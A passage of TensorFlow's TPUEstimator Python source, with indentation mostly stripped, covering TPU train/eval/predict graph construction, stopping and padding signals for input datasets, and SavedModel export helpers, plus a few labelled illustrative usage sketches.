if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
          # scaffold_fn must be called after the variables for TPU embedding
          # have been created on CPU, as the user might reinitialize those from
          # some checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
            # Creates a dummy metric update_op for all metrics. Estimator
            # expects all metrics in `eval_metric_ops` to have an update_op and
            # calls them one by one. The real metric update_ops are invoked in
            # a separate thread. So, here we give Estimator the dummy op for
            # all metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
        # For prediction, the Estimator executes the EstimatorSpec.predictions
        # directly and yields the elements (via a generator) to the call site.
        # So, the outfeed-based prediction must be passed to MonitoredSession
        # directly. Other parts of the TPU execution are organized as follows.
        #
        # 1. All outfeed based Tensors must be grouped with predictions Tensors
        #    to form a single invocation. This avoids the issue of triggering
        #    multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
          host_ops = []  # Empty, we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
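# NOTE: The following sketch is illustrative only and is not part of the
# original library. It shows a minimal TPUEstimator construction consistent
# with the constructor docstring above; `my_model_fn`, the model_dir, and the
# batch sizes are hypothetical placeholders.
def _example_tpu_estimator_construction_sketch(my_model_fn):  # pragma: no cover
  """Builds a TPUEstimator with a minimal RunConfig (illustration only)."""
  run_config = tpu_config.RunConfig(model_dir='/tmp/tpu_model')  # placeholder
  return TPUEstimator(
      model_fn=my_model_fn,
      config=run_config,
      params={'learning_rate': 0.01},  # must not contain reserved keys
      use_tpu=True,
      train_batch_size=64,  # global batch size, split across replicas
      eval_batch_size=64)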
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
        '`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
        '`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_train_step,
[_INITIAL_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(compile_op, dummy_predict_op,) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = ops.get_default_graph().get_operations()
  # Check if there is at least one CrossReplicaSum operation in the graph.
  # This should be introduced by using the CrossShardOptimizer wrapper.
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
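# NOTE: The following sketch is illustrative only and is not part of the
# original library. It shows the capture-once/read-later contract of
# _CapturedObject; the helper name and the captured value are hypothetical.
def _example_captured_object_sketch():  # pragma: no cover
  """Captures a value once and reads it back later (illustration only)."""
  capture = _CapturedObject()
  capture.capture({'anything': 1})  # typically done inside a control-flow body
  return capture.get()              # read back outside the control flow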
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
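# NOTE: The following sketch is illustrative only and is not part of the
# original library. It shows how `_Inputs.from_input_fn` normalizes a
# (features, labels) tuple returned by an input_fn; the tensors and the helper
# name are hypothetical.
def _example_inputs_from_input_fn_sketch():  # pragma: no cover
  """Wraps a (features, labels) return value in _Inputs (illustration only)."""
  features = {'x': array_ops.zeros([2, 3])}
  labels = array_ops.zeros([2])
  inputs = _Inputs.from_input_fn((features, labels))
  # Not a Dataset, so is_dataset is False and the pair is returned directly.
  return inputs.features_and_labels()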
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
      # We append (2 * num_invocations_per_step - 1) batches to exhaust the
      # user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
        # Unpack the single Tensor/dict argument as features. This is required
        # when the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
      # For the non-Tensor case, it is used in a SessionRunHook. So, we cannot
      # modify the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
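# NOTE: The following sketch is illustrative only and is not part of the
# original library. It shows the shape of the stopping signals: a
# [batch_size, 1] bool tensor whose [0][0] element is read back as the scalar
# stopping signal; the helper name is hypothetical.
def _example_stop_signals_sketch():  # pragma: no cover
  """Builds a stopping-signal dict and its scalar form (illustration only)."""
  signals = _StopSignals(stop=True, batch_size=2).as_dict()
  # signals['stopping'] is a [2, 1] tensor of True values here.
  return _StopSignals.as_scalar_stopping_signal(signals)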
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
    # If this assertion failed, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
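# NOTE: The following sketch is illustrative only and is not part of the
# original library. It shows what `_padding_mask` produces for a real batch of
# 3 examples padded up to batch_size=5; the helper name is hypothetical.
def _example_padding_mask_sketch():  # pragma: no cover
  """Mask for 3 real rows padded to a batch of 5 (illustration only)."""
  # Evaluates to [0, 0, 0, 1, 1]: zeros mark real rows, ones mark padding,
  # which is what `slice_tensor_or_dict` uses to drop padded predictions.
  return _PaddingSignals._padding_mask(  # pylint: disable=protected-access
      real_batch_size=3, missing_count=2, batch_size=5)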
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
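# NOTE: The following sketch is illustrative only and is not part of the
# original library. It shows the plain-dict path of `_add_item_to_params`;
# HParams-style objects would go through add_hparam/set_hparam instead. The
# helper name is hypothetical.
def _example_add_item_to_params_sketch():  # pragma: no cover
  """Adds the reserved batch-size key to a plain params dict (illustration)."""
  params = {'learning_rate': 0.01}
  _add_item_to_params(params, _BATCH_SIZE_KEY, 128)  # plain dict: assignment
  return params  # {'learning_rate': 0.01, 'batch_size': 128}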
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
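# NOTE: The following sketch is illustrative only and is not part of the
# original library. It shows how `export_estimator_savedmodel` might be called
# for a CPU/GPU-trained Estimator; `estimator`, `serving_input_receiver_fn`,
# and the export directory are hypothetical placeholders.
def _example_export_estimator_savedmodel_sketch(
    estimator, serving_input_receiver_fn):  # pragma: no cover
  """Exports an Estimator for TPU inference (illustration only)."""
  # The helper re-wraps estimator._model_fn in a TPUEstimator with a minimal
  # RunConfig and then delegates to export_saved_model().
  return export_estimator_savedmodel(
      estimator,
      export_dir_base='/tmp/tpu_export',  # placeholder path
      serving_input_receiver_fn=serving_input_receiver_fn)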
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None,
experimental_export_device_assignment=False,
call_context=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
use inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
experimental_export_device_assignment: Whether to include the device
assignment in the exported model. Doing so is useful in case of model
parallel inference but will tie the exported model to the TPU topology
used to export the model.
    call_context: an optional TPUContext under which the TPU run configuration
is stored.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params, experimental_export_device_assignment,
call_context)
tensors = call_computation(
features,
computation,
experimental_export_device_assignment=
experimental_export_device_assignment,
batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
